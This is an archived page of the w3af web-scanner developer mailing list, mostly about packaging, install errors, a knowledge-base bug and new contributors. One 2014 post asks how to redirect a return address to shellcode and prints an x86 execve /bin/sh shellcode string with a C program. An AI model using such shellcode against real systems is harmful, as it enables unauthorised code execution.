w3af-develop Mailing List for w3af (Page 4)
Status: Beta
Brought to you by:
andresriancho
Menu
▾
▴
w3af-develop — dev list for w3af
You can subscribe to this list here.
| 2008 |
Jan
(20) |
Feb
(36) |
Mar
(45) |
Apr
(83) |
May
(100) |
Jun
(86) |
Jul
(68) |
Aug
(143) |
Sep
(41) |
Oct
(58) |
Nov
(47) |
Dec
(66) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2009 |
Jan
(41) |
Feb
(33) |
Mar
(115) |
Apr
(61) |
May
(68) |
Jun
(83) |
Jul
(64) |
Aug
(33) |
Sep
(18) |
Oct
(62) |
Nov
(61) |
Dec
(24) |
| 2010 |
Jan
(38) |
Feb
(24) |
Mar
(56) |
Apr
(31) |
May
(19) |
Jun
(5) |
Jul
(13) |
Aug
(12) |
Sep
(34) |
Oct
(32) |
Nov
(37) |
Dec
(13) |
| 2011 |
Jan
(50) |
Feb
(56) |
Mar
(15) |
Apr
(12) |
May
(39) |
Jun
(16) |
Jul
(23) |
Aug
(7) |
Sep
(10) |
Oct
(32) |
Nov
(44) |
Dec
(40) |
| 2012 |
Jan
(40) |
Feb
(78) |
Mar
(21) |
Apr
(88) |
May
(56) |
Jun
(89) |
Jul
(55) |
Aug
(37) |
Sep
(31) |
Oct
(47) |
Nov
(13) |
Dec
(8) |
| 2013 |
Jan
(24) |
Feb
(20) |
Mar
(12) |
Apr
(23) |
May
(27) |
Jun
(22) |
Jul
(18) |
Aug
(14) |
Sep
(5) |
Oct
(7) |
Nov
(2) |
Dec
(1) |
| 2014 |
Jan
(7) |
Feb
(13) |
Mar
(52) |
Apr
(23) |
May
(3) |
Jun
|
Jul
|
Aug
(5) |
Sep
(5) |
Oct
(1) |
Nov
|
Dec
|
| 2015 |
Jan
(4) |
Feb
(7) |
Mar
(8) |
Apr
(3) |
May
|
Jun
(2) |
Jul
(12) |
Aug
(15) |
Sep
(9) |
Oct
(3) |
Nov
(4) |
Dec
(10) |
| 2016 |
Jan
(1) |
Feb
|
Mar
|
Apr
|
May
(4) |
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
|
Dec
|
| 2019 |
Jan
|
Feb
|
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2021 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
(1) |
Sep
|
Oct
|
Nov
|
Dec
|
|
From: Andres R. <and...@gm...> - 2015-02-27 16:10:05
|
Guys,
Just found a github ticket you might find interesting.
https://github.com/andresriancho/w3af/issues/3351
On Thu, Feb 26, 2015 at 10:37 AM, Nich Ramsey <oni...@gm...> wrote:
> Hi Andres,
>
> I just started building the packages with virtualenv on a local vm.
> On Feb 26, 2015 2:48 AM, "Andres Riancho" <and...@gm...> wrote:
>>
>> Sergey,
>>
>> On Thu, Feb 26, 2015 at 1:30 AM, Sergey <w3...@ko...> wrote:
>> > Hi, Andres and everybody.
>> >
>> > Right now I see that we have working CI builds of w3af Docker images.
>>
>> We do! I've been working on the docker images last week and you can
>> see the latest in the develop branch :)
>>
>> > I'd like to know if anybody has some setup for building of w3af debian
>> > packages. For example using virtualenv/dh-virtualenv or fabric/robe or
>> > something like this?
>>
>> Not that I know of, but you might be interested in this email thread
>> [0] where we discuss building kali packages in an automated way. The
>> summary is:
>> * I would love to have automated builds of .deb
>> * We could use docker images for testing the created deb packages in
>> Debian/Kali/etc.
>> * I've been using circleci.com and would like to continue using that
>> CI system (free for open source)
>> * This repository is the closest thing we have to an automated .deb
>> package [1] build
>>
>> If you want to help, let me know and we can draft a plan.
>>
>> [0]
>> http://sourceforge.net/p/w3af/mailman/w3af-develop/thread/CA%2B1Rt66cek7ubXJHYe%2BbYxbUZg1HyvRDH7DViQkbUbvbWCxPLA%40mail.gmail.com/
>> [1] https://github.com/andresriancho/w3af-kali/
>>
> I haven't worked with circleci before, but I would be willing to go along
> with Sergey in this if he wants to. If he wanted to tackle the circleci
> alone, I could just share what I learn from the virtualenv build process.
>
>
>> > Thank you.
>> >
>> >
>> > ------------------------------------------------------------------------------
>> > Dive into the World of Parallel Programming The Go Parallel Website,
>> > sponsored
>> > by Intel and developed in partnership with Slashdot Media, is your hub
>> > for all
>> > things parallel software development, from weekly thought leadership
>> > blogs to
>> > news, videos, case studies, tutorials and more. Take a look and join the
>> > conversation now. http://goparallel.sourceforge.net/
>> > _______________________________________________
>> > W3af-develop mailing list
>> > W3a...@li...
>> > https://lists.sourceforge.net/lists/listinfo/w3af-develop
>>
>>
>>
>> --
>> Andrés Riancho
>> Project Leader at w3af - http://w3af.org/
>> Web Application Attack and Audit Framework
>> Twitter: @w3af
>> GPG: 0x93C344F3
>>
>>
>> ------------------------------------------------------------------------------
>> Dive into the World of Parallel Programming The Go Parallel Website,
>> sponsored
>> by Intel and developed in partnership with Slashdot Media, is your hub for
>> all
>> things parallel software development, from weekly thought leadership blogs
>> to
>> news, videos, case studies, tutorials and more. Take a look and join the
>> conversation now. http://goparallel.sourceforge.net/
>> _______________________________________________
>> W3af-develop mailing list
>> W3a...@li...
>> https://lists.sourceforge.net/lists/listinfo/w3af-develop
--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3
|
|
From: Andres R. <and...@gm...> - 2015-02-26 10:47:40
|
Sergey, On Thu, Feb 26, 2015 at 1:30 AM, Sergey <w3...@ko...> wrote: > Hi, Andres and everybody. > > Right now I see that we have working CI builds of w3af Docker images. We do! I've been working on the docker images last week and you can see the latest in the develop branch :) > I'd like to know if anybody has some setup for building of w3af debian > packages. For example using virtualenv/dh-virtualenv or fabric/robe or > something like this? Not that I know of, but you might be interested in this email thread [0] where we discuss building kali packages in an automated way. The summary is: * I would love to have automated builds of .deb * We could use docker images for testing the created deb packages in Debian/Kali/etc. * I've been using circleci.com and would like to continue using that CI system (free for open source) * This repository is the closest thing we have to an automated .deb package [1] build If you want to help, let me know and we can draft a plan. [0] http://sourceforge.net/p/w3af/mailman/w3af-develop/thread/CA%2B1Rt66cek7ubXJHYe%2BbYxbUZg1HyvRDH7DViQkbUbvbWCxPLA%40mail.gmail.com/ [1] https://github.com/andresriancho/w3af-kali/ > Thank you. > > ------------------------------------------------------------------------------ > Dive into the World of Parallel Programming The Go Parallel Website, sponsored > by Intel and developed in partnership with Slashdot Media, is your hub for all > things parallel software development, from weekly thought leadership blogs to > news, videos, case studies, tutorials and more. Take a look and join the > conversation now. http://goparallel.sourceforge.net/ > _______________________________________________ > W3af-develop mailing list > W3a...@li... > https://lists.sourceforge.net/lists/listinfo/w3af-develop -- Andrés Riancho Project Leader at w3af - http://w3af.org/ Web Application Attack and Audit Framework Twitter: @w3af GPG: 0x93C344F3 |
|
From: Sergey <w3...@ko...> - 2015-02-26 04:46:11
|
Hi, Andres and everybody. Right now I see that we have working CI builds of w3af Docker images. I'd like to know if anybody has some setup for building of w3af debian packages. For example using virtualenv/dh-virtualenv or fabric/robe or something like this? Thank you. |
|
From: Andres R. <and...@gm...> - 2015-02-23 11:21:04
|
Gorantla, On Sun, Feb 22, 2015 at 3:05 PM, Gorantla sai <ah...@gm...> wrote: > Hello guys , > > I'm gorantla sai , presently Computer Science Undergraduate > studying at IIT BHU and i'm working on a project which involves using data > from W3af . After testing a web application using w3af , i can see that w3af > is storing data in /home/user/.w3af/tmp folder but i'm unable to get the > http requests from the main.db and various files which have bloom extension, > I have checked the files but all of them seems to have data in some > obfuscated form . I would like to know how to get the http headers and > responses . Any help would be appreciated . Thanks . w3af doesn't obfuscate anything, data might be in binary form which you don't know how to read (yet). If you want all requests and responses I believe the easiest thing to do is to enable the text file output plugin, which will store that info in a text file you define. If for some reason that's not what you want, please take a look at the history_items table in the default database and the .trace files [0] [0] https://github.com/andresriancho/w3af/blob/master/w3af/core/data/db/history.py#L66 > > Cheers , > Gorantla Sai > > ------------------------------------------------------------------------------ > Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server > from Actuate! Instantly Supercharge Your Business Reports and Dashboards > with Interactivity, Sharing, Native Excel Exports, App Integration & more > Get technology previously reserved for billion-dollar corporations, FREE > http://pubads.g.doubleclick.net/gampad/clk?id=190641631&iu=/4140/ostg.clktrk > _______________________________________________ > W3af-develop mailing list > W3a...@li... > https://lists.sourceforge.net/lists/listinfo/w3af-develop > -- Andrés Riancho Project Leader at w3af - http://w3af.org/ Web Application Attack and Audit Framework Twitter: @w3af GPG: 0x93C344F3 |
|
From: Gorantla s. <ah...@gm...> - 2015-02-22 18:05:37
|
Hello guys ,
I'm gorantla sai , presently Computer Science Undergraduate
studying at IIT BHU and i'm working on a project which involves using data
from W3af . After testing a web application using w3af , i can see that
w3af is storing data in /home/user/.w3af/tmp folder but i'm unable to get
the http requests from the main.db and various files which have bloom
extension, I have checked the files but all of them seems to have data in
some obfuscated form . I would like to know how to get the http headers
and responses . Any help would be appreciated . Thanks .
Cheers ,
Gorantla Sai
|
|
From: Andres R. <and...@gm...> - 2015-02-03 14:21:25
|
Alejandro,
Forwarding a private conversation to a mailing list? Not cool!
Also, this mailing list is in English :(
I'll answer just because... but please make sure you respect
mailing list etiquette in the future,
On Tue, Feb 3, 2015 at 11:15 AM, ALEJANDRO CARBALLO <ner...@gm...> wrote:
>
> ---------- Forwarded message ----------
> From: ALEJANDRO CARBALLO <ner...@gm...>
> Date: 2015-02-03 10:54 GMT-03:00
> Subject: Re: interes en aprender seguridad en apps web
> To: Andres Riancho <and...@gm...>
>
>
> Hice lo que me pediste y luego de instalar lo q me pedia para LinuxMint17
> sale al final:
>
> Installing
> /home/alener/w3af/lib/python2.7/site-packages/darts.util.lru-0.5-py2.7-nspkg.pth
> Successfully installed lxml scapy-real guess-language cluster msgpack-python
> python-ntlm halberd darts.util.lru
> Cleaning up...
>
> pero luego al hacer ./w3af_console da al final: ImportError: 'gitdb' could
> not be found in your PYTHONPATH
1- Are you using the same python to install the dependencies/run w3af?
2- Are you using python 2.7?
3- Not sure why, but maybe try with "pip install gitdb"?
>
>
>
>
> El 3 de febrero de 2015, 9:43, ALEJANDRO CARBALLO <ner...@gm...>
> escribió:
>
>> Andrés: Ahora estoy un tu chat, aunque la verdad no estoy nada
>> acostumbrado a ello, no sé cúal es tu nick, el mio es alener.
>>
>> Te cuento que intenté instalar w3af, pero al final me sale esto y no sé
>> como continuar:
>>
>> x86_64-linux-gnu-gcc -pthread -fno-strict-aliasing -DNDEBUG -g -fwrapv -O2
>> -Wall -Wstrict-prototypes -fPIC -I/usr/include/python2.7 -c
>> src/lxml/lxml.etree.c -o build/temp.linux-x86_64-2.7/src/lxml/lxml.etree.o
>> -w
>>
>> In file included from src/lxml/lxml.etree.c:239:0:
>>
>> src/lxml/etree_defs.h:9:31: fatal error: libxml/xmlversion.h: No existe el
>> archivo o el directorio
>>
>> #include "libxml/xmlversion.h"
>>
>> ^
>>
>> compilation terminated.
>>
>> error: command 'x86_64-linux-gnu-gcc' failed with exit status 1
>>
>> ----------------------------------------
>> Can't roll back lxml; was not uninstalled
>> Cleaning up...
>> Command /home/alener/w3af/bin/python -c "import setuptools,
>> tokenize;__file__='/home/alener/w3af/build/lxml/setup.py';exec(compile(getattr(tokenize,
>> 'open', open)(__file__).read().replace('\r\n', '\n'), __file__, 'exec'))"
>> install --record /tmp/pip-VJTZQM-record/install-record.txt
>> --single-version-externally-managed --compile --install-headers
>> /home/alener/w3af/include/site/python2.7 failed with error code 1 in
>> /home/alener/w3af/build/lxml
>> Storing debug log for failure in /home/alener/.pip/pip.log
>>
>>
>> El 2 de febrero de 2015, 22:58, Andres Riancho <and...@gm...>
>> escribió:
>>
>>> Alejandro,
>>>
>>> Buenisimo que estes interesado, encontrame en el IRC de la
>>> herramienta [0] en horarios de 9 am a 7pm, ahi podemos charlar mas
>>> sobre los primeros pasos. Si queres podes ir leyendo esta wiki page
>>> [1] que ayuda a dar el primer paso.
>>>
>>> [0] http://w3af.org/community
>>> [1]
>>> https://github.com/andresriancho/w3af/wiki/First-steps-as-a-contributor
>>>
>>> 2015-02-02 22:07 GMT-03:00 ALEJANDRO CARBALLO <ner...@gm...>:
>>> > Hola, no soy quién empezó el hilo del foro pyar, pero me interesa
>>> > aprender
>>> > lo que proponés
>>> >
>>> > Ví tu video de la última pyconar y me pareció muy interesante y también
>>> > creo
>>> > que fuiste bastante claro
>>> >
>>> > Esta es mi cuenta en github: https://github.com/alener
>>> >
>>> > Espero tu respuesta,
>>> >
>>> > Saludos, Alejandro Carballo
>>> >
>>> >
>>>
>>>
>>>
>>> --
>>> Andrés Riancho
>>> Project Leader at w3af - http://w3af.org/
>>> Web Application Attack and Audit Framework
>>> Twitter: @w3af
>>> GPG: 0x93C344F3
>>
>>
>
>
>
> ------------------------------------------------------------------------------
> Dive into the World of Parallel Programming. The Go Parallel Website,
> sponsored by Intel and developed in partnership with Slashdot Media, is your
> hub for all things parallel software development, from weekly thought
> leadership blogs to news, videos, case studies, tutorials and more. Take a
> look and join the conversation now. http://goparallel.sourceforge.net/
> _______________________________________________
> W3af-develop mailing list
> W3a...@li...
> https://lists.sourceforge.net/lists/listinfo/w3af-develop
>
--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3
|
|
From: ALEJANDRO C. <ner...@gm...> - 2015-02-03 14:15:32
|
---------- Forwarded message ----------
From: ALEJANDRO CARBALLO <ner...@gm...>
Date: 2015-02-03 10:54 GMT-03:00
Subject: Re: interes en aprender seguridad en apps web
To: Andres Riancho <and...@gm...>
Hice lo que me pediste y luego de instalar lo q me pedia para LinuxMint17
sale al final:
Installing
/home/alener/w3af/lib/python2.7/site-packages/darts.util.lru-0.5-py2.7-nspkg.pth
Successfully installed lxml scapy-real guess-language cluster
msgpack-python python-ntlm halberd darts.util.lru
Cleaning up...
pero luego al hacer ./w3af_console da al final: ImportError: 'gitdb' could
not be found in your PYTHONPATH
El 3 de febrero de 2015, 9:43, ALEJANDRO CARBALLO <ner...@gm...>
escribió:
Andrés: Ahora estoy un tu chat, aunque la verdad no estoy nada acostumbrado
> a ello, no sé cúal es tu nick, el mio es alener.
>
> Te cuento que intenté instalar w3af, pero al final me sale esto y no sé
> como continuar:
>
> x86_64-linux-gnu-gcc -pthread -fno-strict-aliasing -DNDEBUG -g -fwrapv -O2
> -Wall -Wstrict-prototypes -fPIC -I/usr/include/python2.7 -c
> src/lxml/lxml.etree.c -o build/temp.linux-x86_64-2.7/src/lxml/lxml.etree.o
> -w
>
> In file included from src/lxml/lxml.etree.c:239:0:
>
> src/lxml/etree_defs.h:9:31: fatal error: libxml/xmlversion.h: No existe el
> archivo o el directorio
>
> #include "libxml/xmlversion.h"
>
> ^
>
> compilation terminated.
>
> error: command 'x86_64-linux-gnu-gcc' failed with exit status 1
>
> ----------------------------------------
> Can't roll back lxml; was not uninstalled
> Cleaning up...
> Command /home/alener/w3af/bin/python -c "import setuptools,
> tokenize;__file__='/home/alener/w3af/build/lxml/setup.py';exec(compile(getattr(tokenize,
> 'open', open)(__file__).read().replace('\r\n', '\n'), __file__, 'exec'))"
> install --record /tmp/pip-VJTZQM-record/install-record.txt
> --single-version-externally-managed --compile --install-headers
> /home/alener/w3af/include/site/python2.7 failed with error code 1 in
> /home/alener/w3af/build/lxml
> Storing debug log for failure in /home/alener/.pip/pip.log
>
>
> El 2 de febrero de 2015, 22:58, Andres Riancho <and...@gm...>
> escribió:
>
> Alejandro,
>>
>> Buenisimo que estes interesado, encontrame en el IRC de la
>> herramienta [0] en horarios de 9 am a 7pm, ahi podemos charlar mas
>> sobre los primeros pasos. Si queres podes ir leyendo esta wiki page
>> [1] que ayuda a dar el primer paso.
>>
>> [0] http://w3af.org/community
>> [1]
>> https://github.com/andresriancho/w3af/wiki/First-steps-as-a-contributor
>>
>> 2015-02-02 22:07 GMT-03:00 ALEJANDRO CARBALLO <ner...@gm...>:
>> > Hola, no soy quién empezó el hilo del foro pyar, pero me interesa
>> aprender
>> > lo que proponés
>> >
>> > Ví tu video de la última pyconar y me pareció muy interesante y también
>> creo
>> > que fuiste bastante claro
>> >
>> > Esta es mi cuenta en github: https://github.com/alener
>> >
>> > Espero tu respuesta,
>> >
>> > Saludos, Alejandro Carballo
>> >
>> >
>>
>>
>>
>> --
>> Andrés Riancho
>> Project Leader at w3af - http://w3af.org/
>> Web Application Attack and Audit Framework
>> Twitter: @w3af
>> GPG: 0x93C344F3
>>
>
>
|
|
From: Andres R. <and...@gm...> - 2015-01-29 12:10:33
|
Nich,
I added some tests [0] to better understand your problem, and here
is what I got:
* The get_uniq_id always returns a string. It might contain
'-3829437' but it's a string
* When we talked in private I told you that info_instance.copy()
would return a copy of the instance, I was wrong. The right way to do
that is copy.deepcopy(info_instance)
* No need to modify the get_uniq_id implementation is needed
[0] https://github.com/andresriancho/w3af/commit/72b3ea44bd78eedb180109a905cf084d74150971
On Thu, Jan 29, 2015 at 8:40 AM, Andres Riancho
<and...@gm...> wrote:
> You mean here?
> https://github.com/andresriancho/w3af/blob/develop/w3af/core/data/kb/info.py#L260
>
> On Wed, Jan 28, 2015 at 11:19 PM, Nich Ramsey <oni...@gm...> wrote:
>> Seems like I fixed the issue. When calling get_desc() in Info.from_info() it
>> is necessary to call it using the with_id=False parameter. Otherwise,
>> information about where the vulnerability was identified gets concatenated
>> to the end of the description.
>>
>> I made the changes in w3af/core/data/kb/info.py and am pushing them to my
>> repo.
>>
>> On Wed, Jan 28, 2015 at 5:33 PM, Nich Ramsey <oni...@gm...> wrote:
>>>
>>> Hey everyone,
>>>
>>> So I have been working on an update method for the KB to update the pickle
>>> objects of Info and Vuln entries. I ran across a problem when attempting to
>>> copy the old instance to a new instance where I could make the updates.
>>>
>>> When I create the new instance using:
>>>
>>> update_info = Info.from_info(old_info)
>>>
>>> the uniq_id of update_info is negative. This obviously causes an issue
>>> when trying to update the uniq_id in the database. Has anyone else run
>>> across this problem, or have a better way to copy an Info/Vuln instance?
>>>
>>> I also tried using old_info.copy() but it just returns a copy of the Dict
>>> part of the Info instance.
>>
>>
>>
>> ------------------------------------------------------------------------------
>> Dive into the World of Parallel Programming. The Go Parallel Website,
>> sponsored by Intel and developed in partnership with Slashdot Media, is your
>> hub for all things parallel software development, from weekly thought
>> leadership blogs to news, videos, case studies, tutorials and more. Take a
>> look and join the conversation now. http://goparallel.sourceforge.net/
>> _______________________________________________
>> W3af-develop mailing list
>> W3a...@li...
>> https://lists.sourceforge.net/lists/listinfo/w3af-develop
>>
>
>
>
> --
> Andrés Riancho
> Project Leader at w3af - http://w3af.org/
> Web Application Attack and Audit Framework
> Twitter: @w3af
> GPG: 0x93C344F3
--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3
|
|
From: Andres R. <and...@gm...> - 2015-01-29 11:41:17
|
You mean here? https://github.com/andresriancho/w3af/blob/develop/w3af/core/data/kb/info.py#L260 On Wed, Jan 28, 2015 at 11:19 PM, Nich Ramsey <oni...@gm...> wrote: > Seems like I fixed the issue. When calling get_desc() in Info.from_info() it > is necessary to call it using the with_id=False parameter. Otherwise, > information about where the vulnerability was identified gets concatenated > to the end of the description. > > I made the changes in w3af/core/data/kb/info.py and am pushing them to my > repo. > > On Wed, Jan 28, 2015 at 5:33 PM, Nich Ramsey <oni...@gm...> wrote: >> >> Hey everyone, >> >> So I have been working on an update method for the KB to update the pickle >> objects of Info and Vuln entries. I ran across a problem when attempting to >> copy the old instance to a new instance where I could make the updates. >> >> When I create the new instance using: >> >> update_info = Info.from_info(old_info) >> >> the uniq_id of update_info is negative. This obviously causes an issue >> when trying to update the uniq_id in the database. Has anyone else run >> across this problem, or have a better way to copy an Info/Vuln instance? >> >> I also tried using old_info.copy() but it just returns a copy of the Dict >> part of the Info instance. > > > > ------------------------------------------------------------------------------ > Dive into the World of Parallel Programming. The Go Parallel Website, > sponsored by Intel and developed in partnership with Slashdot Media, is your > hub for all things parallel software development, from weekly thought > leadership blogs to news, videos, case studies, tutorials and more. Take a > look and join the conversation now. http://goparallel.sourceforge.net/ > _______________________________________________ > W3af-develop mailing list > W3a...@li... > https://lists.sourceforge.net/lists/listinfo/w3af-develop > -- Andrés Riancho Project Leader at w3af - http://w3af.org/ Web Application Attack and Audit Framework Twitter: @w3af GPG: 0x93C344F3 |
|
From: Nich R. <oni...@gm...> - 2015-01-29 02:19:47
|
Seems like I fixed the issue. When calling get_desc() in Info.from_info() it is necessary to call it using the with_id=False parameter. Otherwise, information about where the vulnerability was identified gets concatenated to the end of the description. I made the changes in w3af/core/data/kb/info.py and am pushing them to my repo. On Wed, Jan 28, 2015 at 5:33 PM, Nich Ramsey <oni...@gm...> wrote: > Hey everyone, > > So I have been working on an update method for the KB to update the pickle > objects of Info and Vuln entries. I ran across a problem when attempting to > copy the old instance to a new instance where I could make the updates. > > When I create the new instance using: > > update_info = Info.from_info(old_info) > > the uniq_id of update_info is negative. This obviously causes an issue > when trying to update the uniq_id in the database. Has anyone else run > across this problem, or have a better way to copy an Info/Vuln instance? > > I also tried using old_info.copy() but it just returns a copy of the Dict > part of the Info instance. > |
|
From: Nich R. <oni...@gm...> - 2015-01-29 01:57:51
|
Hey everyone, So I have been working on an update method for the KB to update the pickle objects of Info and Vuln entries. I ran across a problem when attempting to copy the old instance to a new instance where I could make the updates. When I create the new instance using: update_info = Info.from_info(old_info) the uniq_id of update_info is negative. This obviously causes an issue when trying to update the uniq_id in the database. Has anyone else run across this problem, or have a better way to copy an Info/Vuln instance? I also tried using old_info.copy() but it just returns a copy of the Dict part of the Info instance. |
|
From: hadi <alm...@ho...> - 2014-10-07 19:34:06
|
Im using linux and I have c program, I would like to change the return
address to point to my shellcode, im unable to do it.
Can someone point to me how to do it with linux gdb debugger.
Here is my shellcode
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc
2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
Here is my c program
int global_value = 0;
void bang(int val)
{
if (global_value == cookie) {
printf("Bang!: You set global_value to 0x%x\n", global_value);
validate(2);
} else
printf("Misfire: global_value = 0x%x\n", global_value);
exit(0);
}
|
|
From: Andres R. <and...@gm...> - 2014-09-18 11:39:31
|
On Thu, Sep 18, 2014 at 2:06 AM, Chuck Finley <cf...@gm...> wrote: > Andres, > > Thanks for the response. It seems like it should be easy enough and I will > give it my best shot :) I am hoping to have it done and issue a pull request > by tomorrow night. If you've got any doubts, I'm on IRC > - Justin > > On Wed, Sep 17, 2014 at 12:20 PM, Andres Riancho <and...@gm...> > wrote: >> >> PS: Please subscribe to the mailing list so you receive emails others send >> to it >> >> On Wed, Sep 17, 2014 at 4:20 PM, Andres Riancho >> <and...@gm...> wrote: >> > JB, >> > >> > Sorry for the delay in the response, since you didn't subscribe to >> > the mailing list your email was in the moderation queue (which I >> > rarely check, just accepted it because I saw your IRC message). Please >> > read inline: >> > >> > On Mon, Sep 15, 2014 at 1:34 PM, Chuck Finley <cf...@gm...> wrote: >> >> Good Morning Everyone, >> >> >> >> I am a Computer Science student that is very interested in web security >> >> and >> >> penetration testing (about to begin studying for my OSCP!). For my >> >> Software >> >> Engineering class we have been asked to make a small contribution to an >> >> open-source project - so what better project to contribute to than >> >> W3af! I >> >> am very familiar with the concept of open-source projects, however >> >> outside >> >> of creating a Wordpress plugin, I have not contributed to one. >> > >> > That's perfect, tell your professor/teacher that he rocks. >> > >> > We have two documents you'll find interesting: >> > https://github.com/andresriancho/w3af/wiki/Contributing-101 >> > >> > https://github.com/andresriancho/w3af/wiki/First-steps-as-a-contributor >> > >> >> Anyways, I was browsing through the Issues in the Github repo but I >> >> feel >> >> like I might be too green to tackle some of those (despite some Python >> >> experience). I wanted to reach out and see if there are any small bugs >> >> or >> >> maybe an update to some Documentation or something that you guys might >> >> be >> >> able to recommend for me to update >> > >> > Regarding the specific task you might try to implement, this is >> > simple enough: >> > https://github.com/andresriancho/w3af/issues/4794 >> > >> > If that's too simple, then we can look into something else. >> > >> >> Don't worry - I am not just some student who wants someone to do their >> >> homework for them, and then you will never hear from them again. I want >> >> to >> >> actively contribute to this project going forward - just looking for a >> >> bit >> >> of guidance for my first (small) contribution as we are under a short >> >> timeline for this assignment. >> > >> > Cool! Feel free to contact me at #w3af , my nickname is __apr__ >> > >> >> Thank you all very much and I look forward to being apart of the W3af >> >> developer community! >> > >> > Welcome! >> > >> >> - JB >> >> >> >> >> >> ------------------------------------------------------------------------------ >> >> Want excitement? >> >> Manually upgrade your production database. >> >> When you want reliability, choose Perforce >> >> Perforce version control. Predictably reliable. >> >> >> >> http://pubads.g.doubleclick.net/gampad/clk?id=157508191&iu=/4140/ostg.clktrk >> >> _______________________________________________ >> >> W3af-develop mailing list >> >> W3a...@li... >> >> https://lists.sourceforge.net/lists/listinfo/w3af-develop >> >> >> > >> > >> > >> > -- >> > Andrés Riancho >> > Project Leader at w3af - http://w3af.org/ >> > Web Application Attack and Audit Framework >> > Twitter: @w3af >> > GPG: 0x93C344F3 >> >> >> >> -- >> Andrés Riancho >> Project Leader at w3af - http://w3af.org/ >> Web Application Attack and Audit Framework >> Twitter: @w3af >> GPG: 0x93C344F3 > > -- Andrés Riancho Project Leader at w3af - http://w3af.org/ Web Application Attack and Audit Framework Twitter: @w3af GPG: 0x93C344F3 |
|
From: Andres R. <and...@gm...> - 2014-09-17 19:20:55
|
PS: Please subscribe to the mailing list so you receive emails others send to it On Wed, Sep 17, 2014 at 4:20 PM, Andres Riancho <and...@gm...> wrote: > JB, > > Sorry for the delay in the response, since you didn't subscribe to > the mailing list your email was in the moderation queue (which I > rarely check, just accepted it because I saw your IRC message). Please > read inline: > > On Mon, Sep 15, 2014 at 1:34 PM, Chuck Finley <cf...@gm...> wrote: >> Good Morning Everyone, >> >> I am a Computer Science student that is very interested in web security and >> penetration testing (about to begin studying for my OSCP!). For my Software >> Engineering class we have been asked to make a small contribution to an >> open-source project - so what better project to contribute to than W3af! I >> am very familiar with the concept of open-source projects, however outside >> of creating a Wordpress plugin, I have not contributed to one. > > That's perfect, tell your professor/teacher that he rocks. > > We have two documents you'll find interesting: > https://github.com/andresriancho/w3af/wiki/Contributing-101 > https://github.com/andresriancho/w3af/wiki/First-steps-as-a-contributor > >> Anyways, I was browsing through the Issues in the Github repo but I feel >> like I might be too green to tackle some of those (despite some Python >> experience). I wanted to reach out and see if there are any small bugs or >> maybe an update to some Documentation or something that you guys might be >> able to recommend for me to update > > Regarding the specific task you might try to implement, this is > simple enough: > https://github.com/andresriancho/w3af/issues/4794 > > If that's too simple, then we can look into something else. > >> Don't worry - I am not just some student who wants someone to do their >> homework for them, and then you will never hear from them again. I want to >> actively contribute to this project going forward - just looking for a bit >> of guidance for my first (small) contribution as we are under a short >> timeline for this assignment. > > Cool! Feel free to contact me at #w3af , my nickname is __apr__ > >> Thank you all very much and I look forward to being apart of the W3af >> developer community! > > Welcome! > >> - JB >> >> ------------------------------------------------------------------------------ >> Want excitement? >> Manually upgrade your production database. >> When you want reliability, choose Perforce >> Perforce version control. Predictably reliable. >> http://pubads.g.doubleclick.net/gampad/clk?id=157508191&iu=/4140/ostg.clktrk >> _______________________________________________ >> W3af-develop mailing list >> W3a...@li... >> https://lists.sourceforge.net/lists/listinfo/w3af-develop >> > > > > -- > Andrés Riancho > Project Leader at w3af - http://w3af.org/ > Web Application Attack and Audit Framework > Twitter: @w3af > GPG: 0x93C344F3 -- Andrés Riancho Project Leader at w3af - http://w3af.org/ Web Application Attack and Audit Framework Twitter: @w3af GPG: 0x93C344F3 |
|
From: Andres R. <and...@gm...> - 2014-09-17 19:20:36
|
JB,
Sorry for the delay in the response, since you didn't subscribe to
the mailing list your email was in the moderation queue (which I
rarely check, just accepted it because I saw your IRC message). Please
read inline:
On Mon, Sep 15, 2014 at 1:34 PM, Chuck Finley <cf...@gm...> wrote:
> Good Morning Everyone,
>
> I am a Computer Science student that is very interested in web security and
> penetration testing (about to begin studying for my OSCP!). For my Software
> Engineering class we have been asked to make a small contribution to an
> open-source project - so what better project to contribute to than W3af! I
> am very familiar with the concept of open-source projects, however outside
> of creating a Wordpress plugin, I have not contributed to one.
That's perfect, tell your professor/teacher that he rocks.
We have two documents you'll find interesting:
https://github.com/andresriancho/w3af/wiki/Contributing-101
https://github.com/andresriancho/w3af/wiki/First-steps-as-a-contributor
> Anyways, I was browsing through the Issues in the Github repo but I feel
> like I might be too green to tackle some of those (despite some Python
> experience). I wanted to reach out and see if there are any small bugs or
> maybe an update to some Documentation or something that you guys might be
> able to recommend for me to update
Regarding the specific task you might try to implement, this is
simple enough:
https://github.com/andresriancho/w3af/issues/4794
If that's too simple, then we can look into something else.
> Don't worry - I am not just some student who wants someone to do their
> homework for them, and then you will never hear from them again. I want to
> actively contribute to this project going forward - just looking for a bit
> of guidance for my first (small) contribution as we are under a short
> timeline for this assignment.
Cool! Feel free to contact me at #w3af , my nickname is __apr__
> Thank you all very much and I look forward to being apart of the W3af
> developer community!
Welcome!
> - JB
>
> ------------------------------------------------------------------------------
> Want excitement?
> Manually upgrade your production database.
> When you want reliability, choose Perforce
> Perforce version control. Predictably reliable.
> http://pubads.g.doubleclick.net/gampad/clk?id=157508191&iu=/4140/ostg.clktrk
> _______________________________________________
> W3af-develop mailing list
> W3a...@li...
> https://lists.sourceforge.net/lists/listinfo/w3af-develop
>
--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3
|
|
From: Chuck F. <cf...@gm...> - 2014-09-15 16:34:53
|
